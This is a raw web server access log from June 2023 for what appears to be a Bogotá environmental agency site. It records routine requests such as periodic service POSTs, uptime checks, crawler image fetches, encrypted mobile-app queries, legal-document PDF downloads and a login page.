201.245.192.253 - - [18/Jun/2023:10:30:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39254
201.245.192.253 - - [18/Jun/2023:10:30:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
66.249.77.9 - - [18/Jun/2023:10:30:50 -0500] "-" 408 -
200.118.64.109 - - [18/Jun/2023:10:31:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [18/Jun/2023:10:31:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:10:32:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
173.252.111.117 - - [18/Jun/2023:10:32:29 -0500] "GET /images/aire-bogota.jpeg HTTP/1.1" 200 169194
200.118.64.109 - - [18/Jun/2023:10:33:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.102.1.116 - - [18/Jun/2023:10:33:51 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19RBwKx5GJp4lRQSDOVhhDC66dYjwjAkvIqlILgiNrU+45oDdCn0Xx6BMIc1+56oY5pdLMm/EISg2W+vvbiXhxC+MEoaOn0eCwviqQgSYsS7BHc+vv/xuQBcZW/oXmcC3Xll9KfErQy2dwE3aLEboCHaeSvuMypPxbfEPS3hO+MtCqbffHz/lJW71sI6T8HhsUmxWWREnk0A9pxQ9Uzz2qGQicUBLkdkPqI7eqJlvlVNBpj3O82mEBrz7DSyret0rmhQG8uDdkvC49EyKgsn/HXAO28YI85Pd0=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.1.116 - - [18/Jun/2023:10:33:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Xi4MTvXlES/pUL9dQJgEahLtY5ifKd8dEU7FO+ogT35knWk93075XC34c6z+3gMVKm05n4odFbeWKaz8oxZ4jdFjMhRNHj6AwJEX7JtcX89Np/tDMH501SJ5IXZAkQIwpO3NeGLX8Qbj60G7bnYah1lTioYWAcNK/IaOu3zxOGaVCr52lXHt3MD/0IiHXB5WAztdq3P/HSv7rNe1i/74/n06hH+jGXMkatQ18viffc3i/RX+tn+6L6VAMEhrqOz63Kc6Oqx9JBzi3/pTjEqmNbD4sz2VhN+WeXX7+UyOxhAmK8f3jbenoBp6TkGYS69x4mPeev5zIiDEhXsdjxy3JwZbU+HLVgHs/HqwgLOghzeVS+C4VoBYn1YxZ+N2WNhIxaJE8EjR+iuRpfEUQH26+wVSTL6RvL5nnhjPaxYfYNBuH7D9u9k194wKawSjt9qlPSy7TLBdh+5HEpBff5uyHcwZPXroqw10Ox9C/7vAOzi/CrMslEbPqlJgWZY2t9X13dO5Z2+KSOOQHB/vO6snrHkmbJPMUnI6IQrZ3JUrWC8xu3st6vQXigAZCqAgD/OIkrqMt4RZrwhCqciGFjyRE36yxHAaLH7U+nmluBZmxIX3jEBLWKUgudoiKdB2xseAb/rfyL25XQWhvReQGE/vLgr5TCu67ruCkPt6f133ZR58Z1VWTWL5PeKJnrwcrB2Q/rdsCmopoIX7nwYcsl2tu8P9gzuN0yw13qVbmG2vDRw3ra7kJfMqAo5Kk5ZIFubWmp4VfVz1yyaOJM5z7w3hs73NFavpX7ioS8vGYjQ6lrqx/Q7oLKCT9yzcaqj60TfPGPX+kzwlemOiZ6rEi0czkkIa7Nzh007YTRnxdJRy0nDKtDZSlmTkmH+S+omPmmCt6HaAPK3Ngla8houJEF5BfgLbA01H5WyvJ4xYxbKKO7TiSob5gsn3lVyxe2c5VbEPMKo5f7Z+zFtoeBlOIwNCrMN4DRa3bz/7k4luG2ApJGh04o2ZnPDsdIEQ1O5/OxnINVeWFti02By60lwgoLshXrclpw4UpRQ0Bes/dk1mY0oQ0/3rP8VGDBLu4o43r7eToksEl5tYwVGsK4/hbNWhHgqrJnKGtpFqYozCNX9i6GSSxdSaWvcngswLbl2wrBzZOEnuWUFlJdT4O1Np3A3pQuYI9cpijb+itI47m8rjRmTR0t1Ohfv6fiaLCaJHTBpbQf5hDUEROFf2qYesZ9yZ3zlF1N3g75F0aVwENbfWDYlbZVy7umn4rCzOMdKyN3ScEAlydUB5vnpH86SDwfRgRwd+wuP0xvj14n/pSeWgo1sNvRwGM/grXP+fX6Zo6MnFMyqXc320KZgX5Ml3IG7N95GQj8LHgFrwEWbHTJG/8uXAUbWcvSCMZY1Fr2gdlJAJBhYUhOJh0iPxnHFMbB95dmCTx2EbapcQcSyiXZPamHdzcEjO8g2SleFAUnPNcscv5WAx5PFUJz1AdIhyNZasUw8qVz98QWk7IWaIxIpzRo+9zDN/bo0JzGnvj8ZI7UzsVv2hr1cPdAFhkhb2MwsnljAJ62SpLh/43cNv14LnR0tcBSxMFXjJnZo/vX7vAOsCddZzjCeDZRGBS/Ma7R+fIu1enOOk+X4Q=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.1.116 - - [18/Jun/2023:10:33:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX194lf/5pCh3i70GIOSNAKklwOAAu4Zyd4U2Wz0/xq0z7UI0hnVYv/rVY2/OkdxrbwKKUyF6sbLEGrdabHP6GYACLeQ+hEP0xjSPmPXvLNt8tq1jcFzBe/y0nINdvc6cUOiuSMSHegUUKV2cWGres+00lbV7EyQIcwY=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.1.116 - - [18/Jun/2023:10:33:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18v+7/mFPF4kwIe+5tv9XNYmnw3DhQUyI/JBn+2Z2cTsIueG4R7Cp7mBwilsNa1odVuVZU7kGIU846yyGs5bqDMfR5LYtOp+/azylfHAmWGNoX8xr2+HAsaxSQKujVjQgu1iNzz+4xFWNb3GMSDwGpNCziS4Ctmr0s=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.1.116 - - [18/Jun/2023:10:33:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/a63dB7VW28VKO6sqxB4rXG9/B2KDb2g8BqCJe/tFCMSP5goUZinv/4TwrXs0u70SfGP00UMLXvGpFi74Qe/80/MLidM1g4rlVXqj15MJKNmkZ6hXhM8/8ppuY0sJxJcbyG73btx06AmssdsGD1Yli+XDvr/bn9x8=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.1.116 - - [18/Jun/2023:10:33:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+sgYTAleYel0xcekrQ590B7Vk0Upl9oPvhIUoP6JPeq3PRZjnjHayuqH04ZrESzBgrflVqtv1hJ362mlQ6etutR8hz9S7ofAfISxTR4nVzRWVAnKl7a9Gyv+UpNrPvezgBKmjRUJUuxdBYyT0gE+LE9ysgtFxsZ/8aF1D+MQ6KFCgY3UAfDVksaqFgt/GVW2JafDi93+Ne4w==&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
172.22.2.4 - - [18/Jun/2023:10:33:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:10:35:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:34:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
45.156.129.37 - - [18/Jun/2023:10:36:26 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [18/Jun/2023:10:36:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:10:37:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
200.118.64.109 - - [18/Jun/2023:10:37:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
69.171.249.116 - - [18/Jun/2023:10:38:08 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
200.118.64.109 - - [18/Jun/2023:10:39:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
173.252.79.7 - - [18/Jun/2023:10:40:04 -0500] "GET /proyecto-avantia-con-la-union-europea-busca-especialista-en-cambio-climatico.html HTTP/1.1" 200 814
31.13.127.25 - - [18/Jun/2023:10:40:10 -0500] "GET /images/aire-bogota.jpeg HTTP/1.1" 200 169194
201.245.192.253 - - [18/Jun/2023:10:40:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39254
201.245.192.253 - - [18/Jun/2023:10:40:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
172.22.2.4 - - [18/Jun/2023:10:39:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.90 - - [18/Jun/2023:10:41:08 -0500] "GET /galeria/galeria/fotos/Capellania2P.jpg HTTP/1.1" 200 35380
200.118.64.109 - - [18/Jun/2023:10:41:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:40:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
216.245.221.92 - - [18/Jun/2023:10:41:44 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:42:08 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
201.245.192.253 - - [18/Jun/2023:10:42:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
52.167.144.78 - - [18/Jun/2023:10:43:33 -0500] "GET /fima-2023-secretaria-de-ambiente-presento-red-de-monitoreo-de-fauna-y-de-prediccion-climatica.html HTTP/1.1" 200 779
200.118.64.109 - - [18/Jun/2023:10:43:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
185.180.143.141 - - [18/Jun/2023:10:43:48 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
162.55.175.158 - - [18/Jun/2023:10:44:02 -0500] "GET / HTTP/1.1" 200 319
162.55.175.158 - - [18/Jun/2023:10:44:02 -0500] "GET / HTTP/1.1" 200 4720
200.118.64.109 - - [18/Jun/2023:10:45:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [18/Jun/2023:10:46:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:45:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:10:47:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:10:45:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
172.22.2.4 - - [18/Jun/2023:10:47:33 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [18/Jun/2023:10:47:33 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 200 1636862
200.118.64.109 - - [18/Jun/2023:10:47:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:48:12 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Jun/2023:10:49:08 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
200.118.64.109 - - [18/Jun/2023:10:49:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [18/Jun/2023:10:51:41 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:10:51:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [18/Jun/2023:10:52:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:10:50:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:51:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
200.118.64.109 - - [18/Jun/2023:10:53:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.240.201.199 - - [18/Jun/2023:10:54:39 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
200.118.64.109 - - [18/Jun/2023:10:55:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [18/Jun/2023:10:56:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:10:57:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:10:57:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [18/Jun/2023:10:57:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [18/Jun/2023:10:57:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
186.154.167.59 - - [18/Jun/2023:10:57:42 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
200.118.64.109 - - [18/Jun/2023:10:57:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.154.167.59 - - [18/Jun/2023:10:57:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497533
186.154.167.59 - - [18/Jun/2023:10:57:51 -0500] "GET /BLA/resoluciones/AUTOS%202022/3006.pdf HTTP/1.1" 200 446481
172.22.2.4 - - [18/Jun/2023:10:56:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:57:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56452
200.118.64.109 - - [18/Jun/2023:10:59:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.77.9 - - [18/Jun/2023:11:00:51 -0500] "-" 408 -
216.245.221.92 - - [18/Jun/2023:11:01:41 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:11:01:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [18/Jun/2023:11:02:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
200.118.64.109 - - [18/Jun/2023:11:03:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:11:02:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.97 - - [18/Jun/2023:11:04:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/1547.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Jun/2023:11:03:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56100
200.118.64.109 - - [18/Jun/2023:11:05:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [18/Jun/2023:11:06:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:11:07:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
200.118.64.109 - - [18/Jun/2023:11:07:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.102.39.116 - - [18/Jun/2023:11:08:03 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+ftgajR+aaNOKNuO23swT2mNgTh+PywJtKyInekWpqEwTNK0K9QmMJnJGULusGwM6ljYEEwcSVwKtfJG9Ekh8NScq1vzf1B6qVBL4eaOS4+ftSfx9+sT8dvqZJvoVPxlnLcVE7nkY9RYy9wqJVlEiKsUIURPUwMd48CdeKxFHRiv0ioY1dRO55/8epsiyBcyh7kTATZ7NMmMvEpQST+6VC+v5LuUoTvTPHtk3z/v2LvFUyW5+zVbUdDIhnt344sZHJYAKoKFuHLC2S+4xteKxhGRiSsJtOCcE=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.39.116 - - [18/Jun/2023:11:08:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+fPN/V+ElAMYUGVIKtSmRtmvwS8r8lUUU29mvr292PnbIUzgSqUrNJXVIvj+dRDRSmlX3qugybkyxwFQ7Zy4p43UNFHvKCF06kTQvWgLOFfrFXmOMdRLNZiKPzadYWA+uNXcLPV3s7gZ/EE/p4E9HIYjZX2iXWSh1KW9neyimjHFPDhsuGRfDyTHCri49g8FoNNH7foDeMWQIRQN7C6XWJ8DGNBcn4FS8m9jkZ/Ko0aHJ9PGi8O9SHbijN+GGaeIbNC8patpmD8K+tgkbL6ey5Vh/vQq/iKwYL7jcPGEUom2ckptSgvJ0Em+g8ktyCH3dRZX4BPIi1SrJdZLt8wuoDQC3KX9V6C7/klAkTDpWGZofBlQ1fIi+zmrsP+HzzmEfXOnndn5anxVvJ5/Q2xzaAiRoXRdIBPHuv3w4FPawU9GrJcGv9/bRnrLxsuTsdmXn82Jul1hrVymdrQF3NMKz9jj2dNoV/T4zMxNrDYX4meHKTF04AUtY3RWYMhtt+RFJD+BkI1cE9KgdABTTRdpGVq2p7mtPQXYMxMYjIM9daCnPkvYBjy1WMfj7+HK4iX1rYjITEmIecKdg3NXsMDrsnAcbilqixS/un4ofSFDGKHUfzy/8puGf/z6dSkjknHX7KHRX8SwvQthM+dMTz8pH75wNs79cA+6jcr5GaHaZD+PgHNsV3vE3W1V1GDyJTgJjOTEIrbyj8e+87Na0nlvXbRYTiqOr6rCB8hnW7z64L9r4P+//eEFPaB5g9hd3S/VVz8MSnnzD64TmJk7SsYXLyfNGRFSdEzO4190hLn1T7VcQBspYjY8+iM+S9RnDPrZpuce6cRVRWS+g+02ORYx36K4p9PI2IX2iK7y65VZJhyxXKWSZ1DM3Tc2n07qvPz1DDAZ/dx1KX+fvTxXg0OGXTNf/5MheFOJdHP63okos16APn+Bi7xraR6NS/dBmf8goEtAoJEXFPvPz2JlFmMLJOkHYKexPlvMcHwiKR4JFvxYMPY9+RULeKG9IfacJ5R9R51GUVi/t9gXtpRkEAq+xqi+W8Xwq4FO9xCKwUvHWgAnaOIP02Sv8ApyisEcpsW1i0MPLBttm/1HK5NkW2jvJp2v8TsQgKSNnaiziZLUHPh692hdbV9G+Bfi3kskumw7Gyy10ake1V52EPkrnqs2asCzO9h6NtKHRq+4FwsAvq/kBKoEJLXm1fkja/jpZ5jTgsehhjbzGCz+O9bgnnkGPOqeMTatX2NMFwIxC/CdBSE4c7nrT3dn18YSNr0EL6/yG2ryprtlBthks5UZlru/0PFjoRXaaQGvtQzn+EinbxVT86k6NzgBDDLVC4ffwF2vW8a1JwIEfrVh/MXcS6NKmbbd2G7mnsxuGenFmpW0FxVAifRWicnNGMEgg8/oTBwvuC49Nu8IlAOQIraYYE01tIZIGlIS28LKYJQpmmADRjYCq82h90AxHKjEaidElIx6Xn4+gqqmoYNvWMPJWHI1Gb5OCUqqM9QZ8=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.39.116 - - [18/Jun/2023:11:08:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18GkH1eNZtlRttGRLBL5O9dVUDWLTfcaJMKEC/q/xIljZfIkQgby4Wj3JDa5MaZ5fHNuXqK9hbwROC9rB9qwn9pHonob4mOBRY+0syL4sioO3yM1re3LwVqpHNs59HZgXkRT+qfvKAclniKO/20rBOlNa8Zc+nAiF4=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.39.116 - - [18/Jun/2023:11:08:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19nHzkIMQV/YfA+vcuXsm2NJ8PyTKEew59jAxv5EEeYnHxF/eq1X8qEk3B0zacMW66xjqFZB8RdCFDvcpfyqos6LwxHOOOoKY4eYvx6stGzoiJ6I3UTZUhjcr3L34xkfuYMJ90CqE/HRoicBZjVg1I+AVWZmeUcR2Y=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.39.116 - - [18/Jun/2023:11:08:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Afg+3y6Gq7De+3lZZG2YSGN/LnOsxonexG8Fx/bouncwH3xkCxzu14X8qkz9JCgfdw6VE8XKqD5Ejerf03C/YAF1AV0Kx7qwtSjABS4KnnRLmkTFpwtMqCIaftlqJqmDBkDPE29B/9+BSJZglFZGZx4mR11kuhSI=&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
186.102.39.116 - - [18/Jun/2023:11:08:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19j9eANHvEPLCU5aV3loaibJtJMYMEug3Y6l9B5ks3UE7ZHnFK7Y+i+cCrkoUSIRbyQBvJ7Em6dH4fYggsMU7nyGEVF5O1SAYc0g+WiPCPfcY2B3wLv0HUl09xoIIHjEIdcDDxbRU0GipnLteVeGu6tIzbDqPs6/OiFwEeqrYaFYCFKsjiF8dQkVhGQXfZTouskCaJ/hyHLfQ==&u=U2FsdGVkX19cXxgnSW0LDfvbs85z4z0fTfKcTrhel3P09VQSyIw7dSBoLXymwB7X&y=U2FsdGVkX1+Yp9YIME5Ei3/UFvQQGQ2bSsuwpUwawb/uQhN5XtD7Ah5ckNLPvCxK HTTP/1.1" 200 26
200.118.64.109 - - [18/Jun/2023:11:09:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
173.252.83.118 - - [18/Jun/2023:11:10:00 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
172.22.2.4 - - [18/Jun/2023:11:08:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:11:09:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
66.249.70.198 - - [18/Jun/2023:11:11:12 -0500] "-" 408 -
191.156.181.200 - - [18/Jun/2023:11:11:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 252054
191.156.181.200 - - [18/Jun/2023:11:11:16 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
191.156.181.200 - - [18/Jun/2023:11:11:16 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
191.156.181.200 - - [18/Jun/2023:11:11:16 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
191.156.176.59 - - [18/Jun/2023:11:11:16 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
191.156.191.66 - - [18/Jun/2023:11:11:17 -0500] "GET /BLA/resoluciones/dlf/archive.png HTTP/1.1" 200 632
45.171.182.184 - - [18/Jun/2023:11:11:24 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
45.171.182.184 - - [18/Jun/2023:11:11:24 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
45.171.182.184 - - [18/Jun/2023:11:11:24 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
45.171.182.184 - - [18/Jun/2023:11:11:25 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
45.171.182.184 - - [18/Jun/2023:11:11:24 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
45.171.182.184 - - [18/Jun/2023:11:11:25 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [18/Jun/2023:11:11:41 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:11:11:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
45.171.182.184 - - [18/Jun/2023:11:11:54 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
45.171.182.184 - - [18/Jun/2023:11:11:54 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
45.171.182.184 - - [18/Jun/2023:11:11:57 -0500] "POST /appsia/controlador HTTP/1.1" 200 7769
